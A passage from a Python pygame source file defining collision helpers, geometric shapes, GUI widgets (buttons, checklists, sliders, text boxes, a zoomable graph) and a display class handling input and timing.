aabb):\r\n min = aabb.Get(\"min\")\r\n max = aabb.Get(\"max\")\r\n if (point[0] > min[0] and point[0] < max[0]):\r\n if (point[1] > min[1] and point[1] < max[1]):\r\n return True\r\n\r\n @staticmethod\r\n def PointRect(point, rect):\r\n if point[0] > rect[0] and point[0] < rect[0] + rect[2]:\r\n if point[1] > rect[1] and point[1] < rect[1] + rect[3]:\r\n return True\r\n return False\r\n\r\n @staticmethod\r\n def TwoAABB(aabb1, aabb2):\r\n # This will fail and not work for some situations, fix this\r\n return Collision.PointAABB(aabb2[\"min\"], aabb1) or Collision.PointAABB(aabb2[\"max\"], aabb1)\r\n\r\n @staticmethod\r\n def PointSphere(point, sphere):\r\n return np.linalg.norm(point-sphere.Get(\"center\")) <= sphere.Get(\"radius\")\r\n\r\n @staticmethod\r\n def TwoSphere(sphere1, sphere2):\r\n if (not (sphere2[\"wire\"] or sphere1[\"wire\"])):\r\n return [np.linalg.norm(sphere1[\"center\"]-sphere2.Get(\"center\")) < (sphere2.Get(\"radius\") + sphere1[\"radius\"]), (sphere1[\"center\"]+sphere2[\"center\"])/2.0, np.array([0, 0])]\r\n elif ((not sphere1[\"wire\"]) and sphere2[\"wire\"]): # sphere 2 is a wire\r\n c0 = sphere2[\"center\"]\r\n c1 = sphere1[\"center\"]\r\n dr = np.linalg.norm(c1-c0)\r\n p = c0 + \\\r\n (c1-c0) * ((sphere2[\"radius\"] -\r\n sphere1[\"radius\"]) / np.linalg.norm(c1-c0))\r\n n = (c1-p) / np.linalg.norm(c1-p)\r\n return [(sphere2[\"radius\"]-sphere1[\"radius\"] <= dr), p, n]\r\n elif((not sphere2[\"wire\"])and sphere1[\"wire\"]):\r\n return Collision.TwoSphere(sphere2, sphere1)\r\n\r\n @staticmethod\r\n def SphereAABB(sphere, aabb):\r\n clamped = np.clip(sphere[\"center\"], aabb[\"min\"], aabb[\"max\"])\r\n return [np.linalg.norm(clamped-sphere[\"center\"]) < sphere[\"radius\"], clamped]\r\n\r\n @staticmethod\r\n def LineSphere(v0, v1, sphere):\r\n f = np.dot(v1-v0, sphere[\"center\"]-v0) / np.dot(v1-v0, v1-v0)\r\n p = v0 + f*(v1-v0)\r\n return [np.linalg.norm(sphere[\"center\"]-p) < sphere[\"radius\"], p]\r\n\r\n @staticmethod\r\n def ClipLine(d, v0, v1, aabb, f_l, f_h):\r\n f_low = 0.0\r\n f_high = 1.0\r\n\r\n f_dim_low = (aabb[\"min\"][d]-v0[d])/(v1[d]-v0[d])\r\n f_dim_high = (aabb[\"max\"][d]-v0[d])/(v1[d]-v0[d])\r\n\r\n if (f_dim_high < f_dim_low):\r\n temp = f_dim_low\r\n f_dim_high = f_dim_low\r\n f_dim_low = temp\r\n\r\n if (f_dim_high < f_low):\r\n return [False, f_low, f_high]\r\n\r\n if (f_dim_low > f_high):\r\n return [False, f_low, f_high]\r\n\r\n f_low = max(f_dim_low, f_low)\r\n f_high = min(f_dim_high, f_high)\r\n\r\n if (f_low > f_high):\r\n return [False, f_low, f_high]\r\n return [True, f_low, f_high]\r\n\r\n @staticmethod\r\n def LineAABB(v0, v1, aabb):\r\n f_low = 0.0\r\n f_high = 1.0\r\n\r\n [p, f_low, f_high] = Collision.ClipLine(0, v0, v1, aabb, f_low, f_high)\r\n if (not p):\r\n return [False]\r\n [p, f_low, f_high] = Collision.ClipLine(1, v0, v1, aabb, f_low, f_high)\r\n if (not p):\r\n return [False]\r\n\r\n b = v1-v0\r\n return [True, v0 + b * f_low]\r\n\r\nclass Sphere(Object):\r\n def __init__(self, center, radius, wire=False):\r\n super().__init__()\r\n self.Set(\"center\", center)\r\n self.Set(\"radius\", radius)\r\n self.Set(\"wire\", wire)\r\n\r\n def SetCenter(self, center):\r\n self.Set(\"center\", center)\r\n\r\n def SetRadius(self, radius):\r\n self.Set(\"radius\", radius)\r\n\r\nclass AABB(Object):\r\n\r\n @staticmethod\r\n def FromMinMax(min,max):\r\n center = (min+max)/2.0\r\n size = max-min\r\n return AABB(center,size)\r\n\r\n def __init__(self, center, size):\r\n super().__init__()\r\n self.Set(\"center\", np.array(center))\r\n self.Set(\"size\", np.array(size))\r\n self.Set(\"min\", self.Get(\"center\")-self.Get(\"size\")/2.0)\r\n self.Set(\"max\", self.Get(\"center\")+self.Get(\"size\")/2.0)\r\n\r\n def SetCenter(self, center):\r\n self.Set(\"center\", np.array(center))\r\n self.Set(\"min\", self.Get(\"center\")-self.Get(\"size\")/2.0)\r\n self.Set(\"max\", self.Get(\"center\")+self.Get(\"size\")/2.0)\r\n\r\n def SetSize(self, size):\r\n self.Set(\"size\", size)\r\n self.Set(\"min\", self.Get(\"center\")-self.Get(\"size\")/2.0)\r\n self.Set(\"max\", self.Get(\"center\")+self.Get(\"size\")/2.0)\r\n\r\nclass Button(Object):\r\n def __init__(self, string=\"None\", rect=[0, 0, 100, 10], func=None,name = \"\"):\r\n super().__init__()\r\n self.Set(\"string\", string)\r\n self.Set(\"rect\", rect)\r\n self.Set(\"func\", func)\r\n self.Set(\"back_colour\", (169, 169, 169))\r\n self.Set(\"name\",name)\r\n\r\n def Update(self, display):\r\n if (Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")) and display[\"input_button_down\"][1]):\r\n self.Set(\"back_colour\", (105, 105, 105))\r\n else:\r\n self.Set(\"back_colour\", (169, 169, 169))\r\n if Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")) and display[\"input_button_up\"][1]:\r\n if (Collision.PointRect(display[\"input_mouse_pos\"], self.Get(\"rect\"))):\r\n if (self.Get(\"func\") != None):\r\n self.Get(\"func\")(self)\r\n\r\n def Render(self, display):\r\n display.DrawText((255, 255, 255), self.Get(\"rect\")[0:2], self.Get(\r\n \"rect\")[3], self.Get(\"string\"), self.Get(\"back_colour\"))\r\n\r\nclass CheckList(Object):\r\n def __init__(self, items, pos=[10, 10], size=10, check=True,name = \"\"):\r\n super().__init__()\r\n self.Set(\"pos\", pos)\r\n self.Set(\"size\", size)\r\n self.Set(\"items\", items)\r\n self.Set(\"width\", max([len(x) for x in self.Get(\"items\")])*size)\r\n self.Set(\"height\", (len(self.Get(\"items\"))+1)*self.Get(\"size\"))\r\n self.Set(\"selected\", [])\r\n self.Set(\"check\", check)\r\n self.Set(\"callback\", None)\r\n self.Set(\"name\", name)\r\n\r\n def SetCallback(self, func):\r\n self.Set(\"callback\", func)\r\n\r\n def Update(self, display):\r\n pos = self.Get(\"pos\")\r\n width = self.Get(\"width\")\r\n height = self.Get(\"height\")\r\n if Collision.PointRect(display[\"input_mouse_down_pos\"], [pos[0], pos[1], width, height]) and display[\"input_button_tap\"][1]:\r\n s = Sphere([0, 0], 1)\r\n for i in range(len(self.Get(\"items\"))):\r\n s.SetCenter(np.array([pos[0] + int(5+self.Get(\"size\")/2), pos[1] + int(\r\n (self.Get(\"size\") * (i+1/2))+self.Get(\"size\")/2)]))\r\n s.SetRadius(int(self.Get(\"size\")/2 - 1))\r\n if (Collision.PointSphere(display[\"input_mouse_down_pos\"], s)):\r\n if self.Get(\"check\"):\r\n if i in self.Get(\"selected\"):\r\n self.Get(\"selected\").remove(i)\r\n else:\r\n self.Get(\"selected\").append(i)\r\n else:\r\n self.Set(\"selected\", [i])\r\n if self.Get(\"callback\") != None:\r\n self.Get(\"callback\")(self)\r\n\r\n def Render(self, display):\r\n width = self.Get(\"width\")\r\n height = (len(self.Get(\"items\"))+1)*self.Get(\"size\")\r\n surf = pygame.Surface([width, height])\r\n surf.fill((255, 255, 255))\r\n pygame.draw.line(surf, (0, 0, 0), (0, 0), (0, height-1))\r\n pygame.draw.line(surf, (0, 0, 0), (0, height-1), (width-1, height-1))\r\n pygame.draw.line(surf, (0, 0, 0), (width-1, height-1), (width-1, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, 0), (width-1, 0))\r\n for i in range(len(self.Get(\"items\"))):\r\n item_y = self.Get(\"size\") * (i+1/2)\r\n if i in self.Get(\"selected\"):\r\n pygame.gfxdraw.filled_circle(surf, int(5+self.Get(\"size\")/2), int(\r\n item_y+self.Get(\"size\")/2), int(self.Get(\"size\")/2 - 1), (0, 0, 255))\r\n pygame.gfxdraw.aacircle(surf, int(5+self.Get(\"size\")/2), int(\r\n item_y+self.Get(\"size\")/2), int(self.Get(\"size\")/2 - 1), (0, 0, 0))\r\n display.DrawText((0, 0, 0), [\r\n width//3, item_y], int(self.Get(\"size\")), self.Get(\"items\")[i], None, surf)\r\n\r\n display[\"display\"].blit(surf, self.Get(\"pos\"))\r\n\r\nclass Slider(Object):\r\n def __init__(self, min, max, limits, label, step=0,name = \"\"):\r\n super().__init__()\r\n self.Set(\"min\", min)\r\n self.Set(\"max\", max)\r\n self.Set(\"limits\", limits)\r\n self.Set(\"step\",step)\r\n self.Set(\"label\", label)\r\n self.Set(\"value\", 0)\r\n self.Set(\"drag\", False)\r\n self.Set(\"callback\", None)\r\n self.Set(\"name\",name)\r\n\r\n def SetCallback(self, func):\r\n self.Set(\"callback\", func)\r\n \r\n def GetValue(self):\r\n val = self.Get(\"limits\")[0] + self.Get(\"value\") * (self.Get(\"limits\")[1]-self.Get(\"limits\")[0])\r\n if self.Get(\"step\") > 0:\r\n val = round(val/self.Get(\"step\"))*self.Get(\"step\")\r\n return val\r\n\r\n def Update(self, display):\r\n mi = np.array(self.Get(\"min\"))\r\n ma = np.array(self.Get(\"max\"))\r\n l1 = np.array(display[\"input_mouse_down_pos\"]) - mi\r\n l2 = ma - mi\r\n pos = self.Get(\"value\")* (ma-mi)+ mi\r\n s = Sphere(np.array(pos), 10)\r\n \r\n if (not self.Get(\"drag\")):\r\n if (Collision.PointSphere(np.array(display[\"input_mouse_down_pos\"]), s)) and display[\"input_button_down\"][1]:\r\n self.Set(\"drag\", True)\r\n else:\r\n f = np.dot(\r\n (ma-mi), (np.array(display[\"input_mouse_pos\"])-mi))/(np.linalg.norm(ma-mi)**2)\r\n f = max(0.0,min(f,1.0))\r\n if self.Get(\"callback\") != None:\r\n self.Get(\"callback\")(self)\r\n self.Set(\"value\", f)\r\n if (not display[\"input_button_down\"][1]):\r\n self.Set(\"drag\", False)\r\n c = 1/np.linalg.norm(l2) * np.power(np.power(np.linalg.norm(l1)*np.linalg.norm(l2),2) - np.power(np.dot(l1,l2),2),1/2)\r\n f = np.dot((ma-mi), (l1)/(np.linalg.norm(l2)**2))\r\n \r\n if Collision.PointAABB(l1+mi,AABB.FromMinMax(mi-np.array([10,10]),ma + np.array([10,10]))):\r\n step = 0\r\n if self.Get(\"step\") == 0:\r\n step = 0.001\r\n else:\r\n step = self.Get(\"step\")/(self.Get(\"limits\")[1]-self.Get(\"limits\")[0])\r\n step = display[\"input_scroll_delta\"]*step\r\n \r\n f = self.Get(\"value\") + step\r\n\r\n self.Set(\"value\", max(0.0,min(f,1.0)) )\r\n if display[\"input_scroll_delta\"] != 0:\r\n self.Get(\"callback\")(self)\r\n\r\n def Render(self, display):\r\n pygame.draw.aaline(display[\"display\"], (0, 0, 0),\r\n self.Get(\"min\"), self.Get(\"max\"))\r\n\r\n pygame.gfxdraw.filled_circle(display[\"display\"], self.Get(\r\n \"min\")[0], self.Get(\"min\")[1], 10, (255, 255, 255))\r\n pygame.gfxdraw.filled_circle(display[\"display\"], self.Get(\r\n \"max\")[0], self.Get(\"max\")[1], 10, (255, 255, 255))\r\n pygame.gfxdraw.aacircle(display[\"display\"], self.Get(\"min\")[\r\n 0], self.Get(\"min\")[1], 10, (0, 0, 0))\r\n pygame.gfxdraw.aacircle(display[\"display\"], self.Get(\"max\")[\r\n 0], self.Get(\"max\")[1], 10, (0, 0, 0))\r\n\r\n mi = np.array(self.Get(\"min\"))\r\n ma = np.array(self.Get(\"max\"))\r\n pos = (self.Get(\"value\") * (ma-mi)) + mi\r\n pygame.gfxdraw.filled_circle(display[\"display\"], int(\r\n pos[0]), int(pos[1]), 10, (0, 0, 255))\r\n pygame.gfxdraw.aacircle(display[\"display\"], int(\r\n pos[0]), int(pos[1]), 10, (0, 0, 0))\r\n display.DrawText((0, 0, 0), ((mi+ma)/2.0 + np.array([-len(self.Get(\"label\"))*1.5, -15])), 12, '{label} {value:.2f}'.format(label=self.Get(\"label\"), value=self.GetValue()))\r\n\r\nclass TextBox(Object):\r\n CHARS = 'qwertyuiopasdfghjklzxcvbnm/*-+#\\'[]'\r\n NUMBERS = '0123456789.'\r\n\r\n def __init__(self, initial_string=\"\", rect=[10, 10, 100, 10], border_colour=[128, 128, 128], back_colour=[255, 255, 255], limit_to_numbers=False, label = \"\",name = \"\"):\r\n super().__init__()\r\n self.Set(\"text\", initial_string)\r\n self.Set(\"rect\", rect)\r\n self.Set(\"border_colour\", border_colour)\r\n self.Set(\"back_colour\", back_colour)\r\n self.Set(\"limit_to_numbers\", limit_to_numbers)\r\n self.Set(\"is_float\", False)\r\n self.Set(\"start_type\", False)\r\n self.Set(\"callback\", None)\r\n self.Set(\"label\",label)\r\n self.Set(\"name\",name)\r\n\r\n def SetCallback(self, func):\r\n self.Set(\"callback\", func)\r\n\r\n def Update(self, display):\r\n if (Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")) and display[\"input_button_tap\"][1] and not self.Get(\"start_type\")):\r\n self.Set(\"start_type\", True)\r\n if (self.Get(\"start_type\")):\r\n chars = TextBox.NUMBERS\r\n input_chars = display[\"input_key_tap_dict\"]\r\n if (not self.Get(\"limit_to_numbers\")):\r\n chars += TextBox.CHARS\r\n for char in input_chars:\r\n if char in chars:\r\n if char == '.':\r\n if self.Get(\"is_float\") or len(self.Get(\"text\")) == 0:\r\n continue\r\n self.Set(\"is_float\", True)\r\n self.Set(\"text\", self.Get(\"text\")+str(char))\r\n if (display[\"input_key_tap\"][pygame.K_BACKSPACE]):\r\n if self.Get(\"text\").endswith('.'):\r\n self.Set(\"is_float\", False)\r\n self.Set(\"text\", self.Get(\"text\")[:-1])\r\n if (display[\"input_key_tap\"][pygame.K_RETURN] and self.Get(\"start_type\")):\r\n if (self.Get(\"callback\") != None):\r\n self.Get(\"callback\")(self)\r\n if (not Collision.PointRect(display[\"input_mouse_pos\"], self.Get(\"rect\")) and display[\"input_button_tap\"][1] and self.Get(\"start_type\")):\r\n if (self.Get(\"callback\") != None):\r\n self.Get(\"callback\")(self)\r\n self.Set(\"start_type\", False)\r\n\r\n def Render(self, display):\r\n surf = pygame.Surface(self.Get(\"rect\")[2:4])\r\n surf.fill(self.Get(\"border_colour\"))\r\n size = self.Get(\"rect\")[2:4]\r\n display.FilledRect(self.Get(\"back_colour\"), [\r\n size[0]//2, size[1]//2], [size[0]-2, size[1]-2], False, surf)\r\n render_text = self.Get(\"text\")\r\n display.DrawText((0, 0, 0, 255), [\r\n 0, size[1]//4], size[1]//2, render_text, None, surf)\r\n display.Get(\"display\").blit(surf, self.Get(\"rect\")[0:2])\r\n [pos_x, pos_y] = self.Get(\"rect\")[0:2]\r\n display.DrawText((0,0,0),[pos_x,pos_y-15],15,self.Get(\"label\"))\r\n\r\nclass Graph(Object):\r\n def __init__(self, rect=[10, 10, 100, 100], bounds=[0, 0, 0, 0],name = \"\"):\r\n super().__init__()\r\n self.Set(\"rect\", rect)\r\n self.Set(\"bounds\", bounds)\r\n self.Set(\"default_bounds\", bounds[:])\r\n self.Set(\"plots\", [])\r\n self.Set(\"screen_plots\", [])\r\n self.Set(\"surface\", pygame.Surface(rect[2:4]))\r\n self.Set(\"mouse_graph_pos\", [0, 0])\r\n self.Set(\"zoom_rect_start\", [0, 0])\r\n self.Set(\"zoom_rect_end\", [0, 0])\r\n self.Set(\"colour_list\",[(0,0,128),(0,128,0),(0,128,0),(128,0,0),(128,0,0)])\r\n self.Set(\"name\",name)\r\n self.Set(\"x_label\",None)\r\n self.Set(\"y_label\",None)\r\n self.Replot(bounds)\r\n\r\n def PlotToScreen(self, plot):\r\n screen_points = []\r\n for point in plot:\r\n x_new = (point[0]-self.Get(\"bounds\")[0])/(self.Get(\"bounds\")\r\n [1]-self.Get(\"bounds\")[0])*self.Get(\"rect\")[2]\r\n y_new = ((point[1]-self.Get(\"bounds\")[2])/(self.Get(\"bounds\")[3] -\r\n self.Get(\"bounds\")[2]))*(1-self.Get(\"rect\")[3])+(self.Get(\"rect\")[3]-1)\r\n screen_points.append([x_new, y_new])\r\n return screen_points\r\n\r\n def ScreenToPlot(self, screen, offset=True):\r\n plot_points = []\r\n for point in screen:\r\n x_new = ((point[0]-self.Get(\"rect\")[0])/(self.Get(\"rect\")[2])\r\n )*(self.Get(\"bounds\")[1]-self.Get(\"bounds\")[0])\r\n y_new = ((point[1]-self.Get(\"rect\")[1])/(self.Get(\"rect\")[3])\r\n )*(self.Get(\"bounds\")[2]-self.Get(\"bounds\")[3])\r\n if offset:\r\n x_new = ((point[0]-self.Get(\"rect\")[0])/(self.Get(\"rect\")[2])\r\n )*(self.Get(\"bounds\")[1]-self.Get(\"bounds\")[0])\r\n y_new = ((point[1]-self.Get(\"rect\")[1])/(self.Get(\"rect\")[3])\r\n )*(self.Get(\"bounds\")[2]-self.Get(\"bounds\")[3])\r\n x_new += self.Get(\"bounds\")[0]\r\n y_new += self.Get(\"bounds\")[3]\r\n else:\r\n x_new = ((point[0])/(self.Get(\"rect\")[2])) * \\\r\n (self.Get(\"bounds\")[1]-self.Get(\"bounds\")[0])\r\n y_new = ((point[1])/(self.Get(\"rect\")[3])) * \\\r\n (self.Get(\"bounds\")[2]-self.Get(\"bounds\")[3])\r\n plot_points.append([x_new, y_new])\r\n return plot_points\r\n\r\n def Clear(self,resetBounds = True):\r\n self.Set(\"plots\", [])\r\n self.Set(\"screen_plots\", [])\r\n if resetBounds:\r\n self.Set(\"bounds\", [0, 0, 0, 0])\r\n self.Set(\"default_bounds\", [0, 0, 0, 0])\r\n\r\n surf = self.Get(\"surface\")\r\n surf.fill((255, 255, 255))\r\n pygame.draw.line(surf, (0, 0, 0), (0, self.Get(\"rect\")[3]), (0, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, self.Get(\"rect\")[\r\n 3]-1), (self.Get(\"rect\")[2], self.Get(\"rect\")[3]-1))\r\n pygame.draw.line(surf, (0, 0, 0), (self.Get(\"rect\")[\r\n 2]-1, self.Get(\"rect\")[3]-1), (self.Get(\"rect\")[2]-1, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, 0), (self.Get(\"rect\")[2], 0))\r\n\r\n def Plot(self, x_values, y_values, resize = True):\r\n if (len(x_values) == len(y_values)):\r\n points = [[x_values[i], y_values[i]]\r\n for i in range(0, len(x_values))]\r\n points = sorted(points,key = lambda l:l[0])\r\n x_min = min(min(x_values), self.Get(\"bounds\")[0])\r\n x_max = max(max(x_values), self.Get(\"bounds\")[1])\r\n y_min = min(min(y_values), self.Get(\"bounds\")[2])\r\n y_max = max(max(y_values), self.Get(\"bounds\")[3])\r\n if x_min == x_max:\r\n x_min -= 1\r\n x_max += 1\r\n if y_min == y_max:\r\n y_min -= 1\r\n y_max += 1\r\n if resize:\r\n self.Replot([x_min, x_max, y_min, y_max])\r\n self.Set(\"default_bounds\", [x_min, x_max, y_min, y_max])\r\n else:\r\n if len(self.Get(\"plots\")) == 0 and self.Get(\"default_bounds\") == [0,0,0,0]:\r\n self.Set(\"default_bounds\",[x_min,x_max,y_min,y_max])\r\n self.Replot([x_min,x_max,y_min,y_max])\r\n else:\r\n self.Replot(self.Get(\"bounds\"))\r\n colour = self.Get(\"colour_list\")[len(self.Get(\"plots\"))%len(self.Get(\"colour_list\"))]\r\n self.Get(\"plots\").append(points)\r\n pygame.draw.aalines(self.Get(\"surface\"),colour , False, self.PlotToScreen(points))\r\n \r\n def Replot(self,bounds):\r\n self.Set(\"bounds\",bounds)\r\n surf = self.Get(\"surface\")\r\n surf.fill((255, 255, 255))\r\n pygame.draw.line(surf, (0, 0, 0), (0, self.Get(\"rect\")[3]), (0, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, self.Get(\"rect\")[\r\n 3]-1), (self.Get(\"rect\")[2], self.Get(\"rect\")[3]-1))\r\n pygame.draw.line(surf, (0, 0, 0), (self.Get(\"rect\")[\r\n 2]-1, self.Get(\"rect\")[3]-1), (self.Get(\"rect\")[2]-1, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, 0), (self.Get(\"rect\")[2], 0))\r\n for i in range(len(self.Get(\"plots\"))):\r\n screen_plot = self.PlotToScreen(self.Get(\"plots\")[i])\r\n colour = self.Get(\"colour_list\")[i%len(self.Get(\"colour_list\"))]\r\n pygame.draw.aalines(surf, colour, False, screen_plot)\r\n\r\n\r\n def Update(self, display):\r\n if Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")) and display[\"input_button_down\"][1]:\r\n delta_pos = np.array(\r\n display[\"input_mouse_pos\"])-np.array(display[\"input_mouse_pos_old\"])\r\n delta_graph = self.ScreenToPlot([delta_pos], False)[0]\r\n x_min = self.Get(\"bounds\")[0] - delta_graph[0]\r\n x_max = self.Get(\"bounds\")[1] - delta_graph[0]\r\n y_min = self.Get(\"bounds\")[2] - delta_graph[1]\r\n y_max = self.Get(\"bounds\")[3] - delta_graph[1]\r\n self.Replot([x_min,x_max,y_min,y_max])\r\n if Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")):\r\n if display[\"input_key_tap\"][pygame.K_r]:\r\n self.Replot(self.Get(\"default_bounds\")[:])\r\n if display[\"input_scroll_delta\"] != 0:\r\n f = 1 - display[\"input_scroll_delta\"]/10.0\r\n p = self.ScreenToPlot([display[\"input_mouse_pos\"]])[0]\r\n x_min = p[0] + (self.Get(\"bounds\")[0]-p[0])*f\r\n x_max = p[0] + (self.Get(\"bounds\")[1]-p[0])*f\r\n y_min = p[1] + (self.Get(\"bounds\")[2]-p[1])*f\r\n y_max = p[1] + (self.Get(\"bounds\")[3]-p[1])*f\r\n self.Replot([x_min, x_max, y_min, y_max])\r\n if display[\"input_button_down\"][3]:\r\n self.Set(\"zoom_rect_start\", display[\"input_mouse_down_pos\"])\r\n self.Set(\"zoom_rect_end\", display[\"input_mouse_pos\"])\r\n if display[\"input_button_up\"][3]:\r\n g0 = self.ScreenToPlot([self.Get(\"zoom_rect_start\")], True)[0]\r\n g1 = self.ScreenToPlot([self.Get(\"zoom_rect_end\")], True)[0]\r\n self.Replot([min(g0[0], g1[0]),\r\n max(g0[0], g1[0]),\r\n min(g1[1], g0[1]),\r\n max(g1[1], g0[1])])\r\n\r\n if (Collision.PointRect(display[\"input_mouse_pos\"], self.Get(\"rect\"))):\r\n graph_pos = self.ScreenToPlot(\r\n [display[\"input_mouse_pos\"]], True)[0]\r\n self.Set(\"mouse_graph_pos\", graph_pos)\r\n\r\n def Render(self, display):\r\n surf = self.Get(\"surface\")\r\n [p_x, p_y] = self.Get(\"rect\")[0:2]\r\n display[\"display\"].blit(surf, self.Get(\"rect\")[0:2])\r\n display.DrawText((0, 0, 0), [\r\n p_x - 20, p_y], 11, '{0:1.2g}'.format(self.Get(\"bounds\")[3]), (255, 255, 255))\r\n display.DrawText((0, 0, 0), [p_x - 20, p_y+self.Get(\"rect\")[3]-10],\r\n 11, '{0:1.2g}'.format(self.Get(\"bounds\")[2]), (255, 255, 255))\r\n display.DrawText((0, 0, 0), [p_x, p_y+self.Get(\"rect\")[3]+5], 11,\r\n '{0:1.2g}'.format(self.Get(\"bounds\")[0]), (255, 255, 255))\r\n display.DrawText((0, 0, 0), [p_x+self.Get(\"rect\")[2]-5, p_y+self.Get(\"rect\")[\r\n 3]+5], 11, '{0:1.2g}'.format(self.Get(\"bounds\")[1]), (255, 255, 255))\r\n if (Collision.PointRect(display[\"input_mouse_pos\"], self.Get(\"rect\"))):\r\n display.DrawText((0, 0, 0), [display[\"size\"][0]//2, display[\"size\"][1]-20], 15,\r\n '(x = {0:1.2g}, y = {1:1.2g})'.format(self.Get(\"mouse_graph_pos\")[0], self.Get(\"mouse_graph_pos\")[1]))\r\n if (display[\"input_button_down\"][3]):\r\n g0 = self.Get(\"zoom_rect_start\")\r\n g1 = self.Get(\"zoom_rect_end\")\r\n pygame.gfxdraw.rectangle(display[\"display\"], [g0[0],\r\n g0[1],\r\n g1[0]-g0[0],\r\n g1[1]-g0[1]], (0, 0, 0))\r\n mi = np.array(self.Get(\"rect\")[0:2])\r\n ma = mi + np.array(self.Get(\"rect\")[2:4])\r\n center = (mi+ma)/2.0\r\n if self.Get(\"x_label\") != None: \r\n center[1] = ma[1]\r\n center[0] = center[0]-len(self.Get(\"x_label\"))*12\r\n display.DrawText((0,0,0),center,12,self.Get(\"x_label\"))\r\n if self.Get(\"y_label\") != None:\r\n center[0] = mi[0]-12\r\n center[1] = center[1]-len(self.Get(\"y_label\"))*12\r\n display.DrawText((0,0,0),center,12,self.Get(\"y_label\"),angle = 90.0)\r\n\r\nclass Display(Object):\r\n def __init__(self, width, height, title):\r\n super().__init__()\r\n self.Set(\"size\", np.array([width, height]))\r\n self.Set(\"isClosing\", 0)\r\n self.Set(\"bounds\", np.array([0, width, height, 0]))\r\n self.Set(\"clearColour\", (0, 0, 0))\r\n\r\n bounds = self.Get(\"bounds\")\r\n s_x = self.Get(\"size\")[0] / (bounds[1]-bounds[0])\r\n s_y = self.Get(\"size\")[1] / (bounds[2]-bounds[3])\r\n o_x = - (bounds[0]*self.Get(\"size\")[0]) / (bounds[1] - bounds[0])\r\n o_y = self.Get(\"size\")[\r\n 1] + ((bounds[2]*self.Get(\"size\")[1])/(bounds[3]-bounds[2]))\r\n self.Set(\"point_matrix\", np.array(\r\n [[s_x, 0, 0], [0, s_y, 0], [o_x, o_y, 1]]))\r\n self.Set(\"dist_matrix\", np.array([[s_x, 0], [0, s_y]]))\r\n\r\n os.environ[\"SDL_VIDEO_WINDOW_POS\"] = \"%d,%d\" % (100, 100)\r\n\r\n pygame.init()\r\n self.Set(\"display\", pygame.display.set_mode([width, height]))\r\n pygame.display.set_caption(title)\r\n\r\n pygame.font.init()\r\n self.Set(\"font\", pygame.font.Font(pygame.font.get_default_font(), 64))\r\n\r\n self.Set(\"timer_start\", 0)\r\n self.Set(\"timer_end\", pygame.time.get_ticks())\r\n self.Set(\"timer_delta\", 0.0)\r\n self.Set(\"timer_start\", self.Get(\"timer_end\"))\r\n\r\n self.Set(\"input_key_max\", 400)\r\n self.Set(\"input_key_down\", [False]*self.Get(\"input_key_max\"))\r\n self.Set(\"input_key_old\", [False]*self.Get(\"input_key_max\"))\r\n self.Set(\"input_key_tap\", [False]*self.Get(\"input_key_max\"))\r\n self.Set(\"input_key_tap_dict\", [])\r\n\r\n self.Set(\"input_button_max\", 10)\r\n self.Set(\"input_button_down\", [False]*self.Get(\"input_button_max\"))\r\n self.Set(\"input_button_old\", [False]*self.Get(\"input_button_max\"))\r\n self.Set(\"input_button_tap\", [False]*self.Get(\"input_button_max\"))\r\n self.Set(\"input_button_up\", [False]*self.Get(\"input_button_max\"))\r\n self.Set(\"input_scroll_pos\", 0)\r\n self.Set(\"input_scroll_pos_old\", 0)\r\n self.Set(\"input_scroll_delta\", 0)\r\n\r\n self.Set(\"input_mouse_down_pos\", [0, 0])\r\n self.Set(\"input_mouse_pos\", [0, 0])\r\n self.Set(\"input_mouse_pos_old\", [0, 0])\r\n\r\n def Update(self):\r\n self.Set(\"timer_end\", pygame.time.get_ticks())\r\n self.Set(\"timer_delta\", (self.Get(\"timer_end\") -\r\n self.Get(\"timer_start\"))/1000.0)\r\n if (self.Get(\"timer_delta\") > 1/60.0):\r\n self.Set(\"timer_delta\", 1/60.0)\r\n self.Set(\"timer_start\", self.Get(\"timer_end\"))\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.Set(\"isClosing\", 1)\r\n return\r\n elif event.type == pygame.KEYDOWN:\r\n self.Get(\"input_key_down\")[event.key] = True\r\n elif event.type == pygame.KEYUP:\r\n self.Get(\"input_key_down\")[event.key] = False\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 4:\r\n self.Set(\"input_scroll_pos\",\r\n self.Get(\"input_scroll_pos\")+1)\r\n elif event.button == 5:\r\n self.Set(\"input_scroll_pos\",\r\n self.Get(\"input_scroll_pos\")-1)\r\n self.Get(\"input_button_down\")[event.button] = True\r\n self.Set(\"input_mouse_pos\", event.pos)\r\n self.Set(\"input_mouse_down_pos\", event.pos)\r\n elif event.type == pygame.MOUSEBUTTONUP:\r\n self.Get(\"input_button_down\")[event.button] = False\r\n self.Set(\"input_mouse_pos\", event.pos)\r\n elif event.type == pygame.MOUSEMOTION:\r\n self.Set(\"input_mouse_pos\", event.pos)\r\n\r\n self.UpdateAll(self)\r\n self.RenderAll(self)\r\n pygame.display.flip()\r\n self.Get(\"display\").fill(self.Get(\"clearColour\"))\r\n\r\n self.Set(\"input_key_tap_dict\", [])\r\n for i in range(0, max(self.Get(\"input_key_max\"), self.Get(\"input_button_max\"))):\r\n self.Get(\"input_key_tap\")[i] = self.Get(\"input_key_down\")[\r\n i] and not self.Get(\"input_key_old\")[i]\r\n if (self.Get(\"input_key_tap\")[i]):\r\n self.Get(\"input_key_tap_dict\").append(pygame.key.name(i))\r\n self.Get(\"input_key_old\")[i] = self.Get(\"input_key_down\")[i]\r\n if (i > min(i, self.Get(\"input_button_max\")-1)):\r\n continue\r\n self.Get(\"input_button_tap\")[i] = self.Get(\"input_button_down\")[\r\n i] and not self.Get(\"input_button_old\")[i]\r\n self.Get(\"input_button_up\")[i] = self.Get(\"input_button_old\")[\r\n i] and not self.Get(\"input_button_down\")[i]\r\n self.Get(\"input_button_old\")[i] = self.Get(\"input_button_down\")[i]\r\n self.Set(\"input_scroll_delta\", self.Get(\r\n 